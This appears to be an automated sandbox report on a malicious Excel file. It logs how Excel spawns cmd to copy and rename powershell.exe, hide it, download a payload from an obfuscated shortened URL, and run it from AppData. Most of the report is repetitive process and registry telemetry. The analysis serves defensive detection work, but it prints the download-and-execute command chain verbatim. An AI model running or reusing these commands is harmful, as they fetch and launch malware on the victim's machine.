Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process created: C:\Users\user\AppData\Roaming\vc.exe C:\Users\user\AppData\Roaming\vc.exe
Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden'
Source: unknown	Process created: C:\Windows\System32\Robocopy.exe robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout /t 1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Source: unknown	Process created: C:\Users\user\AppData\Roaming\vc.exe C:\Users\user\AppData\Roaming\vc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\Robocopy.exe robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process created: C:\Users\user\AppData\Roaming\vc.exe C:\Users\user\AppData\Roaming\vc.exe

Source: C:\Users\user\AppData\Local\Temp\o.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\o.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32

Source: Window Recorder	Window detected: More than 3 window changes detected
Source: Window Recorder	Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\o.exe	File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\o.exe	File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: powershell.pdb source: o.exe
Source:	Binary string: mscorrc.pdb source: o.exe, 00000010.00000002.2139683736.000000001B240000.00000002.00000001.sdmp
Source:	Binary string: powershell.pdb source: o.exe
Source:	Binary string: mscorrc.pdb source: o.exe, 00000010.00000002.2139683736.000000001B240000.00000002.00000001.sdmp

Data Obfuscation:

Obfuscated command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')

Source: C:\Users\user\AppData\Roaming\vc.exe	Code function: 20_2_00FF07D8 push es; ret
Source: C:\Users\user\AppData\Roaming\vc.exe	Code function: 20_2_00FF07D8 push es; ret

Source: initial sample	Static PE information: section name: .text entropy: 7.71178527327
Source: initial sample	Static PE information: section name: .text entropy: 7.71178527327

Persistence and Installation Behavior:

Drops PE files to the document folder of the user

Show sources

Source: C:\Users\user\AppData\Local\Temp\o.exe	File created: C:\Users\user\Documents\vc.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\o.exe	File created: C:\Users\user\Documents\vc.exe			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\o.exe	File created: C:\Users\user\Documents\vc.exe	Jump to dropped file
Source: C:\Windows\System32\Robocopy.exe	File created: C:\Users\user\AppData\Local\Temp\powershell.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\o.exe	File created: C:\Users\user\Documents\vc.exe	Jump to dropped file
Source: C:\Windows\System32\Robocopy.exe	File created: C:\Users\user\AppData\Local\Temp\powershell.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\o.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\o.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Robocopy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Robocopy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Robocopy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Robocopy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\timeout.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\timeout.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
